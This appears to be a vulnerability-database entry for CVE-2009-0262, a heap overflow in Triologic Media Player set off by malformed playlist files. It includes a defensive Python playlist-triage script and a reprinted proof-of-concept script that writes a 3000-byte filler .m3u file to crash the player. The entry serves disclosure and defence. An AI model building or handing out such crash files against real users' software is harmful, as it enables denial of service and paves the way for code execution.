Triologic Media Player Playlist File Parsing Heap Overflow Vulnerability

Vulnerability ID 1117225 Vulnerability Type Buffer overflow
Published 2009-01-12 Updated 2009-02-05
CVE ID CVE-2009-0262 CNNVD-ID CNNVD-200901-324
Platform Windows CVSS Score 9.3
|Vulnerability Source
https://www.exploit-db.com/exploits/7737
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-324
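|Vulnerability Details
Triologic Media Player is a free media player that supports multiple media formats. If a user is tricked into loading a malformed *.m3u or *.m3l playlist file with Triologic Media Player, a heap overflow can be triggered, leading to arbitrary code execution.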
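
A defensive triage check for the playlist files described above, as an added example that is not part of the original advisory or the PoC author's code: it flags .m3u/.m3l entries far longer than any real path or URL, and long runs of one repeated byte. The `audit_playlist` name, the 1024-byte limit and the 256-byte run threshold are assumptions, since the advisory does not state the size of the overflowed buffer; the sample inputs are constructed.

```python
import re

# Assumed thresholds: the advisory gives no buffer size, so these are
# conservative values chosen for illustration only.
MAX_ENTRY_BYTES = 1024   # longest playlist entry accepted without a finding
MIN_FILLER_RUN = 256     # repeated-byte run length treated as filler

LINE_BREAK = re.compile(rb"\r\n|\n|\r")
FILLER = re.compile(rb"(.)\1{%d,}" % (MIN_FILLER_RUN - 1), re.DOTALL)


def audit_playlist(data: bytes, max_entry: int = MAX_ENTRY_BYTES):
    """Return (line_number, reason) findings for raw .m3u/.m3l content."""
    findings = []
    for number, line in enumerate(LINE_BREAK.split(data), start=1):
        if len(line) > max_entry:
            findings.append(
                (number, f"entry is {len(line)} bytes (limit {max_entry})"))
        run = FILLER.search(line)
        if run:
            findings.append(
                (number, f"{len(run.group(0))}-byte run of byte "
                         f"0x{run.group(1)[0]:02x}"))
    return findings


# Constructed sample: an ordinary extended-M3U playlist.
BENIGN = (b"#EXTM3U\r\n"
          b"#EXTINF:215,Artist - Title\r\n"
          b"C:\\Music\\track01.mp3\r\n")

# Constructed sample with the same shape as the file the PoC writes:
# one unbroken 3000-byte line and no playlist structure at all.
SUSPECT = b"\x41" * 3000

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("suspect", SUSPECT)):
        results = audit_playlist(blob)
        print(name, "->", results if results else "no findings")
```

Run as a mail-gateway or download-folder check, this quarantines oversized entries before a vulnerable player opens the file; it is a triage heuristic and does not replace removing or updating the affected player.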
|Exploit
# IN THE NAME OF ALLAH :)
#!/usr/bin/python
# Discovered By : zAx
# Download Application : http://www.download.com/Triologic-Media-Player/3000-2139_4-10601848.html?tag=mncol

print "**************************************************************************"
print " Triologic Media Player 7 (.m3u) Local Heap Buffer Overflow PoC\n"
print " Discovered By : zAx\n"
print " ThE-zAx@HoTMaiL.CoM\n"
print " In that PoC thanks for : Stack ;) My BrOthEr :)"
print "**************************************************************************"

overflow = "\x41" * 3000 # not right, just a PoC

try:
    out_file = open("zAx.m3u",'w')
    out_file.write(overflow)
    out_file.close()
    raw_input("\nPoC file created!, Now go to the program and click at Load Button\n")
except:
    print "Error"
# EoF

# milw0rm.com [2009-01-12]
|References

Source: BID
Name: 33221
Link: http://www.securityfocus.com/bid/33221
Source: VUPEN
Name: ADV-2009-0097
Link: http://www.frsirt.com/english/advisories/2009/0097
Source: SECUNIA
Name: 33496
Link: http://secunia.com/advisories/33496
Source: MILW0RM
Name: 7737
Link: http://milw0rm.com/exploits/7737